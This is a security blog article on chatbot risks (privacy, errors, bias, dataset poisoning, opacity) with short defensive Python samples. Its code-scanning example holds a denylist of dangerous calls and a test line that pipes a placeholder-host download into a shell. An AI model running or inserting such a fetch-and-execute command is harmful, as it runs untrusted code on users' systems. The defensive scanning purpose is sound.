Modern Chatbots

Advanced Dangers and Risks

by Marc Ruef
on March 23, 2023
time to read: 8 minutes

Keypoints

Dangers Posed by Modern Chatbots

  • Modern chatbots such as ChatGPT have a far-reaching social impact
  • There are various risks for operators and users of corresponding systems
  • These range from breaches of secrecy and privacy to erroneous response behavior, problematic narratives and malware
  • Fundamentally, such systems must offer more transparency in order to build and maintain trust

Probably no other technical development has sparked such a broad social discussion in recent years as ChatGPT. The chatbot convinces with a very good command of language and a far-reaching knowledge base. It is foreseeable that such systems will put many professions under pressure. But such solutions also introduce additional risks for operators and users. This article shows which dangers must be considered and how they can be countered.

ChatGPT is based on GPT, a language model trained on large amounts of data to acquire fluency. Its ability to provide human-like answers rests on deep learning, which allows it to classify the language and meaning of sentences. Machine learning is then used to generate an appropriate response based on the data and information collected during the training process. The system therefore cannot understand or think in the human sense, but approximates texts that it once learned. For this reason, answers may vary depending on the complexity of the question and the availability of relevant information.
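
A minimal sketch of this autoregressive principle is shown below. It uses the Hugging Face transformers library with the publicly available gpt2 checkpoint as a stand-in, since ChatGPT itself cannot be run locally; the prompt, model choice and sampling parameters are illustrative assumptions.

```python
# Minimal sketch: autoregressive text generation with a small GPT-style model.
# "gpt2" is a public stand-in; ChatGPT uses a much larger, closed model.
from transformers import AutoModelForCausalLM, AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("gpt2")
model = AutoModelForCausalLM.from_pretrained("gpt2")

prompt = "A chatbot answers questions by"
inputs = tokenizer(prompt, return_tensors="pt")

# The model predicts one token at a time based on patterns seen during training;
# it does not "understand" the question in a human sense.
output_ids = model.generate(
    **inputs,
    max_new_tokens=30,
    do_sample=True,                        # sample from the predicted distribution
    top_p=0.9,                             # nucleus sampling keeps only likely continuations
    pad_token_id=tokenizer.eos_token_id,
)
print(tokenizer.decode(output_ids[0], skip_special_tokens=True))
```

Running the snippet several times yields different continuations, which illustrates the variability described above.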

Violation of Secrecy and Privacy

Chatbots interact with humans. In dialog, users may disclose sensitive and confidential data, for example when an AI-supported quote is to be created and customer-specific details are entered for this purpose. This data becomes accessible to the AI operator and could be misused.

However, self-learning systems can also use these inputs for further processing. Thus, if user A enters details about a customer X, user B could receive those same details as a response to a similar query.

Potential misuse ranges from copyright infringement to social engineering attacks to identity theft and extortion. For this reason, it is advisable to handle sensitive requests with great care. Personal, sensitive and customer-specific information should be avoided as far as possible. Companies should issue guidelines on how such systems may be used. These guidelines can be based on those already issued for online translation services, for example.
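
As one possible form of such a guideline in code, the following sketch masks obvious personal identifiers before a prompt leaves the company. The regular expressions and placeholder labels are illustrative assumptions and no substitute for a complete PII filter or a legal review.

```python
import re

# Hypothetical pre-filter: mask obvious personal data before a prompt is sent
# to an external chatbot. The patterns are illustrative, not exhaustive.
PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "phone": re.compile(r"\+?\d[\d\s/-]{7,}\d"),
    "iban":  re.compile(r"\b[A-Z]{2}\d{2}[A-Z0-9]{11,30}\b"),
}

def redact(prompt: str) -> str:
    """Replace matches with placeholders so customer-specific details never reach the operator."""
    for label, pattern in PATTERNS.items():
        prompt = pattern.sub(f"[{label.upper()} REDACTED]", prompt)
    return prompt

print(redact("Please draft a quote for jane.doe@example.com, phone +41 44 123 45 67."))
# -> Please draft a quote for [EMAIL REDACTED], phone [PHONE REDACTED].
```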

Erroneous Response Behavior

Modern chatbots are trained using existing data sets. This allows them to acquire the relevant knowledge and respond to questions coherently – or at least pretend to be sure of their answers. The quality and quantity of the source material is largely responsible for the quality of the responses. Incorrect or manipulated material can lead to unwelcome effects. For example, untruths can be spread, fueling the concept of Fake News.

A long-term danger, which will grow steadily, is posed by feedback loops. What happens when chatbots are trained on data generated by chatbots? Faulty data is thus amplified and established by the systems as absolute truth.

Responses generated by chatbots must therefore always be checked to ensure that their content is correct. It does not matter whether a short biography, a summary of a news report or a rough offer was generated. A plausibility check of this kind presupposes, of course, that the user of the system can understand and classify the contents. Generating results is simple in each case; classifying them and ensuring their quality, on the other hand, requires extensive understanding.

A chatbot provider should offer an uncomplicated way to mark faulty dialogs as such and to submit suggestions for corrections. This way, the quality of the solution can be increased through the active cooperation of the users.
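
Such a feedback channel does not need to be complex. The sketch below shows a hypothetical record that a chatbot frontend could submit when a user flags a faulty dialog; all field names, identifiers and the endpoint are assumptions for illustration only.

```python
import json
from dataclasses import dataclass, asdict
from datetime import datetime, timezone

# Hypothetical feedback record for flagging a faulty dialog; field names are illustrative.
@dataclass
class DialogFeedback:
    conversation_id: str
    message_id: str
    issue: str                   # e.g. "factually_wrong", "outdated", "incomplete"
    suggested_correction: str

feedback = DialogFeedback(
    conversation_id="c-1234",
    message_id="m-5678",
    issue="factually_wrong",
    suggested_correction="The report was published in 2021, not 2019.",
)
payload = {"submitted_at": datetime.now(timezone.utc).isoformat(), **asdict(feedback)}
print(json.dumps(payload, indent=2))  # would be sent to the provider's feedback endpoint
```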

Reinforcing Problematic Narratives

When training chatbots, the operators define the data set and with it the weighting of the individual statements. This inevitably introduces a certain subjective tendency. As a result, certain narratives can become very pronounced while others are marginalized. Problematic, offensive and discriminatory effects can thereby be amplified.

When training chatbots, attention must be paid to the quality of the data set. The weighting of individual statements must be carefully worked out, with certain tendencies flagged or rigorously prevented. Unfiltered misogynistic and racist statements as well as the spreading of scurrilous conspiracy theories provide no benefit whatsoever.

Here, too, providers should offer appropriate functions for reporting problematic content in an uncomplicated manner. Reported content should then be checked, adjusted or blocked in a moderation process.
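
A first, automated line of defense for such a moderation process could look like the sketch below: responses matching a configurable blocklist are withheld until a human moderator has reviewed them. The blocklist entries are placeholders; a production system would rely on far more sophisticated classifiers.

```python
# Minimal sketch of a moderation gate in front of the user-facing chat.
# The blocklist terms are placeholders for an actual classifier or word list.
BLOCKLIST = {"example_slur", "example_conspiracy_claim"}

def moderate(response: str) -> tuple[bool, str]:
    """Return (deliver, text): flagged responses are held back for human review."""
    flagged = [term for term in BLOCKLIST if term in response.lower()]
    if flagged:
        # In a real system the dialog would be queued for a human moderator here.
        return False, f"Response withheld pending review (matched: {', '.join(flagged)})"
    return True, response

deliver, text = moderate("Here is a neutral answer to your question.")
print(deliver, text)
```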

Large manufacturers such as Microsoft and Google have come under pressure from ChatGPT and do not want to leave the lucrative market to competitors without a fight. It can be observed that they try to gain an advantage by downsizing or completely abolishing their ethics teams. This may pay off commercially in the short term. In the long run, however, this decision will take its toll, for with every problematic statement a system loses trust and acceptance. This cannot be regained easily, as research in the area of human-machine trust and trust establishment has shown.

Spreading Malware

Manipulating or compromising a chatbot can cause it to spread malware. This can happen, as with other applications, via vulnerabilities such as cross-site scripting or SQL injection. However, such an attack can also target the dataset. If, for example, a chatbot is used to generate program code, manipulation could lead to malicious code being infiltrated and output in dialogs that appear harmless.

Responses from chatbots must therefore always be checked. This content check must also be carefully implemented for code samples in order to prevent vulnerable or malicious generated code from being executed in production environments.
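
A static pre-check can catch the most obvious cases before generated code is executed. The sketch below scans chatbot-generated Python for a small denylist of dangerous calls using the standard ast module; the denylist is an illustrative assumption and does not replace human review or dedicated SAST tooling.

```python
import ast

# Calls that should at least trigger a manual review before execution (illustrative denylist).
SUSPICIOUS_CALLS = {"eval", "exec", "system", "popen", "__import__"}

def flag_suspicious(code: str) -> list[str]:
    """Return findings for obviously dangerous calls in generated Python code."""
    findings = []
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Call):
            name = getattr(node.func, "id", None) or getattr(node.func, "attr", None)
            if name in SUSPICIOUS_CALLS:
                findings.append(f"line {node.lineno}: call to {name}()")
    return findings

generated = "import os\nos.system('curl http://example.invalid | sh')\n"
for finding in flag_suspicious(generated):
    print(finding)   # -> line 2: call to system()
```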

Lack of Transparency

It is not uncommon for a chatbot to come up with an answer that makes amazing sense. Sometimes, however, the opposite is true. Either way, users may feel the need to understand why this particular answer was chosen. But most systems lack transparency of this kind. Instead, it is up to the user to correctly classify and accept a dialog. This lack of insight can lead to a certain dependence, especially when topics are discussed whose contents and implications cannot be assessed by users, or only to a limited extent.

It must be a declared goal for developers of AI solutions that their products come with a so-called verbose mode. The user must always have the possibility to demand an explanation for a result. For chatbots, a simple approach is to allow the user to ask a why question: Why did you give this answer? It is then up to the chatbot to show the derivation of the result, in order to lend some degree of confidence to its own approach. Unfortunately, current solutions are still far from offering mechanisms of this kind.
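
Until a genuine verbose mode exists, the why question can at least be asked explicitly in a follow-up turn. The sketch below does this with the OpenAI Python client as an assumed interface; the model name is illustrative, and the returned explanation is itself generated text rather than a faithful trace of the model's internal reasoning.

```python
from openai import OpenAI  # assumes the openai Python package and an OPENAI_API_KEY in the environment

client = OpenAI()

history = [
    {"role": "user", "content": "Which encryption should we use for our customer backups?"},
]
first = client.chat.completions.create(model="gpt-4", messages=history)
answer = first.choices[0].message.content
history.append({"role": "assistant", "content": answer})

# The "why question": ask the chatbot to derive its own result.
history.append({"role": "user",
                "content": "Why did you give this answer? List your assumptions and sources."})
followup = client.chat.completions.create(model="gpt-4", messages=history)
print(followup.choices[0].message.content)
```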

Conclusion

As with any technology, there are risks associated with its use. It is therefore critical that developers and users are aware of these risks and take appropriate measures to ensure the security and privacy of the data and information shared with chatbots.

Overall, AI-based chatbots, now available to the masses, offer exciting possibilities for human-machine interaction. But it remains important to approach them with skeptical optimism and to prioritize the security of the system and its users.

To minimize risk, it is important to follow best practices in cybersecurity. It is also crucial to maintain transparency and accountability in the development and deployment of chatbots, not least with regard to ethical aspects. In doing so, the legal obligations arising from the EU's AI Act must be observed. This regulation of AI systems in the EU, which also affects anyone who wants to trade with the EU, may result in a general ban on text-generating systems, or in very high requirements being placed on operators that will be difficult to fulfill, in part for financial reasons.

About the Author

Marc Ruef

Marc Ruef has been working in information security since the late 1990s. He is well-known for his many publications and books. His most recent book, The Art of Penetration Testing, discusses security testing in detail. He is a lecturer at several faculties, such as ETH, HWZ, HSLU and IKF. (ORCID 0000-0002-1328-6357)
